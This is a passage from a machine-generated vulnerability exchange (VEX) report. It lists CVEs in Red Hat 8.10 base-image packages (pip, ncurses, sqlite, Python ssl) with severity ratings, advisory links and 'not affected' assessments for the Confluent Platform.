          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2023-50495",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "description": "NCurse v6.4-20230418 was discovered to contain a segmentation fault via the component _nc_wrap_entry().",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2023-50495"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2023-50495"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LU4MYMKFEZQ5VSCVLRIZGDQOUW3T44GT/"
        },
        {
          "url": "https://lists.gnu.org/archive/html/bug-ncurses/2023-04/msg00020.html"
        },
        {
          "url": "https://lists.gnu.org/archive/html/bug-ncurses/2023-04/msg00029.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-50495"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20240119-0008/"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6684-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2023-50495"
        }
      ],
      "published": "2023-12-12T15:15:07+00:00",
      "updated": "2026-06-17T06:39:44+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
              "version": "6.1-10.20180224.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "6.1-10.20180224.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2024-0232",
      "ratings": [
        {
          "source": {
            "name": "bitnami"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        416
      ],
      "description": "A heap use-after-free issue has been identified in SQLite in the jsonParseAddNodeArray() function in sqlite3.c. This flaw allows a local attacker to leverage a victim to pass specially crafted malicious input to the application, potentially causing a crash and leading to a denial of service.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2024-0232"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2024-0232"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2243754"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QDCMYQ3J45NHQ4EJREM3BJNNKB5BK4Y7/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0232"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20240315-0007/"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2024-0232"
        }
      ],
      "published": "2024-01-16T14:15:48+00:00",
      "updated": "2026-06-17T06:53:02+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.26.0-20.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2024-0397",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "bitnami"
          },
          "score": 7.4,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        362
      ],
      "description": "A defect was discovered in the Python \u201cssl\u201d module where there is a memory\nrace condition with the ssl.SSLContext methods \u201ccert_store_stats()\u201d and\n\u201cget_ca_certs()\u201d. The race condition can be triggered if the methods are\ncalled at the same time as certificates are loaded into the SSLContext,\nsuch as during the TLS handshake with a certificate directory configured.\nThis issue is fixed in CPython 3.10.14, 3.11.9, 3.12.3, and 3.13.0a5.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2024-0397"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2024/06/17/2"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2024-0397"
        },
        {
          "url": "https://github.com/python/cpython/commit/01c37f1d0714f5822d34063ca7180b595abf589d"
        },
        {
          "url": "https://github.com/python/cpython/commit/29c97287d205bf2f410f4895ebce3f43b5160524"
        },
        {
          "url": "https://github.com/python/cpython/commit/37324b421b72b7bc9934e27aba85d48d4773002e"
        },
        {
          "url": "https://github.com/python/cpython/commit/542f3272f56f31ed04e74c40635a913fbc12d286"
        },
        {
          "url": "https://github.com/python/cpython/commit/b228655c227b2ca298a8ffac44d14ce3d22f6faa"
        },
        {
          "url": "https://github.com/python/cpython/commit/bce693111bff906ccf9281c22371331aaff766ab"
        },
        {
          "url": "https://github.com/python/cpython/commit/bce693111bff906ccf9281c22371331aaff766ab%20%283.13%29"
        },
        {
          "url": "https://github.com/python/cpython/issues/114572"
        },
        {
          "url": "https://github.com/python/cpython/pull/114573"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2024/12/msg00000.html"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/BMAK5BCGKYWNJOACVUSLUF6SFGBIM4VP/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0397"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250411-0006/"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6928-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2024-0397"
        }
      ],
      "published": "2024-06-17T16:15:10+00:00",
      "updated": "2026-06-17T06:53:24+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
